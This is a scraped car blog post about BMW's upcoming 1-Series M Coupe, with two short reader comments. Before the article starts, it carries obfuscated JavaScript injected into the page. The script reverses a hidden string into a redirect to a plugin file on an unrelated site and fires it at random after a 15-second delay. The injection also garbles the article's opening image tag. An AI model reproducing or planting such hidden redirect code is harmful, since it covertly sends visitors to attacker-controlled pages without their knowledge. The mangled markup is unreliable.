$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston.com/media/2010/08/BMW-1-M-Coupe-001.jpg” alt=”” width=”645″ height=”349″ />
Yes BMW M-Power have gone down the path they said they never would (Turbo) and yes they have built not one but two big, slightly overweight SUV’s with the M-Power badge affixed. However they now have the chance to redeem themselves 100% with the advent of the spiritual successor to the greatest BMW that was ever created.
The 1-Series fettled by M. Will it really be as good as the legend they call the E30 M3? We think it will and we are excited about seeing in the Middle East.
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Phil McGovern
So do we – It has the potential to be a great!!!
I hope they build this, and build it light. The 135i is a great little car but is only 80Kg lighter than the 335i which is a real shame.